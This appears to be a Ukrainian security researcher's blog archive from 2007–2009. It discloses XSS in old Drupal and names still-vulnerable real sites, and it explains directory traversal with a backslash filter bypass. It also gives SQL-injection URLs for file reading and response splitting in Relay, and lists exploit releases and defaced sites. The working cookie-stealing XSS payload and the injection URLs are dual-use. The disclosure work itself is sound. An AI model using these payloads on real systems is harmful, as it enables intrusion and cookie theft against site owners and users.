Websecurity - Веб безпека

Учора я писав про XSS уразливість в Drupal. Сьогодні я зробив дослідження сайтів на движку Drupal, щоб виявити інші сайти з даною уразливістю. І я виявив чимало сайтів на старих версіях Drupal, в тому числі тих, що мають цю дірку.

Зокрема сьогодні я виявив наступні сайти з Cross-Site Scripting уразливістю: http://applefritter.com, http://tomorrow.sg і http://systbio.org (які використовують даний движок).

XSS:

POST запит на сторінці http://applefritter.com/user/password, на сторінці http://tomorrow.sg/user/password і на сторінці http://systbio.org/?q=user/password:
<BODY onload="a='alert';b='(document.cookie)';eval(a+b);"В полях: Username та E-mail address.

При проведенні Directory Traversal атак, використовуються слеші (slash). Це також відноситься до атак з використанням Local File Include і SSI Injection уразливостей.

http://site/script?file=../secret.data

Атаки з використанням слеша працюють на будь-яких операційних системах (Windows, Linux, Unix). Про Directory Traversal та інші уразливості, де використовуються сиволи обходу директорій, веб розробники переважно обізнані, тому й часто фільтрують дані символи в своїх додатках.

Але як я продемонстрував в 2007 році на прикладі Local file include та Directory traversal уразливостей в WordPress, існує можливість проведення даних атак навіть при наявності захисту від них. Для цього потрібно використати зворотній слеш (back slash).

При використанні зворотнього слеша атака може бути проведена лише на ОС Windows. І за допомогою зворотнього слеша можна проводити всі атаки, де використовуються символи обходу директорій - Directory Traversal, Local File Include і SSI Injection.

http://site/script?file=..\secret.data

Враховуючи, що веб розробники часто забувають про зворотній слеш, фільтруючи лише слеш, це дозволяє обходити захисні фільтри і проводити атаки на веб сайти. Тому всім розробникам варто пам’ятати про зворотні слеши і фільтрувати їх в своїх веб додатках.

Нещодавно була виявлена можливість пошкодження пам’яті в Internet Explorer 7. Що може бути використано для проведення DoS атак та віддаленого виконання довільного коду. Для даної уразливості був розроблений експлоіт.

Даний експлоіт не працює в мене на IE6. Можливо він працює лише на IE7.

• MS Internet Explorer 7 Memory Corruption PoC (MS09-002) (деталі)

В даній добірці уразливості в веб додатках:

• Philips VOIP841 Multiple Vulnerabilities (деталі)
• artmedic weblog multiple local file inclusion vulnerabilities (деталі)
• Astrosoft HelpDesk Multiple XSS (деталі)
• JSPWiki Multiple Vulnerabilities (деталі)
• joomla “com_omnirealestate” S@L Injection (деталі)
• Vulnerability in joomla “com_model” (деталі)
• joomla upload php code or picture (com_uhp) (деталі)
• all forums.asp hack (деталі)
• ALL VERSION PHPAUTOVIDEO c99 shell (деталі)
• Pre-auth remote commands execution in SAP MaxDB 7.6.03.07 (деталі)

Ще 12.11.2007 я знайшов Cross-Site Scripting уразливість в Drupal. Про що найближчим часом сповіщу розробників системи.

Дану уразливість я виявив на сайті http://it.ridne.net, який зокрема публікує новини на тему інформаційної безпеки. Як я виявив в 2008 році, коли дішла черга до публікації даної дірки на it.ridne.net, вони вже виправили її (явно шляхом апгрейда движка, навіть не підозрюючи, що на сайті є уразливість).

XSS:

POST запит на сторінці http://site/user/password
<BODY onload="a='alert';b='(document.cookie)';eval(a+b);"В полях: Username та E-mail address.

Уразливі Drupal 4.5.2 та попередні версії (і можливо деякі наступні версії). В останніх версіях уразливість вже виправлена.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.qplaze.com (хакером Komanachi) - 11.02.2009, зараз сайт виправлений адмінами
• http://crimean-miracle.com (хакерами MJO і CharmaniaL) - 11.02.2009, зараз сайт відключений хостером
• http://ukrainainkognita.org.ua (хакером Cyber_945) - похакана директорія сайта
• http://indonbass.com.ua (хакером KaRiZmA_0_5) - 11.02.2009, зараз сайт виправлений адмінами
• http://www.polyplus.com.ua (хакером DaNG3R)

30.11.2007

У листопаді, 30.11.2007, я знайшов Cross-Site Scripting уразливості на проекті http://tinyurl.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.02.2009

XSS:

• alert(’XSS’)
• alert(document.cookie)

XSS (Mozilla / Firefox / Opera / Chrome):

• alert(’XSS’)
• alert(document.cookie)

Код спрацьовує при кліку на лінці “Proceed to this site”. Це strictly social XSS: в першому випадку це persistent підтип даного типу XSS, а в другому - persistent self-contained підтип.

XSS (IE):

• alert(document.cookie)
• цікавий

Дані уразливості досі не виправлені.

В даній добірці експлоіти в веб додатках:

• minb 0.1.0 Remote Code Execution Exploit (деталі)
• phsBlog 0.2 Bypass SQL Injection Filtering Exploit (деталі)
• D-iscussion Board 3.01 (topic) Local File Inclusion Vulnerability (деталі)
• Grafitti Forums 1.0 Remote SQL Injection/HTML Injection Vulnerabilities (деталі)
• Ezphotogallery 2.1 XSS/FD/Bypass/SQL Injection Exploit (деталі)
• Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability (деталі)
• Autodealers CMS AutOnline (pageid) SQL Injection Vulnerability (деталі)
• PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities (деталі)
• Autodealers CMS AutOnline (id) SQL Injection Vulnerability (деталі)
• Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC (деталі)

Минулого року я вже писав про уразливості в Relay. Учора, 16.02.2009, я виявив дві нові уразливості в Relay - Directory Traversal та HTTP Response Splitting. Обидві уразливості пов’язані з однією SQL Injection в Relay, про яку я писав торік. Дані дві атаки проводяться через SQL ін’єкцію.

Якщо HTTP Response Splitting через SQL Injection я раніше вже зустрічав, то Directory Traversal через SQL Injection я виявив вперше (саме в Relay). Ідею подібної атаки мені підкинув Alex на прикладі дірки на http://referat.com.ua.

Подібні атаки відрізняються від считування файлів засобами СУБД (як LOAD_FILE в MySQL) в тому, що вони не залежать від прав користувача на роботу з файловою системою. І тому дані атаки можуть застосовуватися для обходу обмеження на роботу з файловою системою в СУБД.

Directory Traversal (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,char(98,111,111,116,46,105,110,105),char(99,58),char(47,102,105,108,101,115,116,111,114,101),1,1,1,1,1,1,1,1,1,1

Для отримання файла boot.ini. На інших ОС можна отримати інші файли.

HTTP Response Splitting (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,1,1,char(47,102,105,108,101,115,116,111,114,101),char(10,83,101,116,45,67,111,111,107,105,101,58,32,110,97,109,101,61,118,97,108,117,101,59,32,112,97,116,104,61,47,59),1,1,1,1,1,1,1,1,1

Для встановлення кукіса.

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

В Web Security Mailing List Bil Corry привів цікавий перелік логічний уразливостей. В переліку наведені приклади логічних уразливостей на відомих сайтах, що викликали найбільшу увагу громадськості.

Біл привів наступні логічні уразливості:

• Yahoo SEM Logic Flaw
• Tower Records Tunes Its Site
• Youtube’s 18+ Filters Don’t Work
• Peekaboo! Facebook fills photo security hole
• Hole unveils Facebook fan pages
• Man Allegedly Bilks E-trade, Schwab of $50,000 by Collecting Lots of Free ‘Micro-Deposits’
• Apple and AT&T providing free Wi-Fi access to iPhone users and oops? to everyone else as well!
• Paris and Lindsay Hacked Again (There’s a Lesson Here, Really)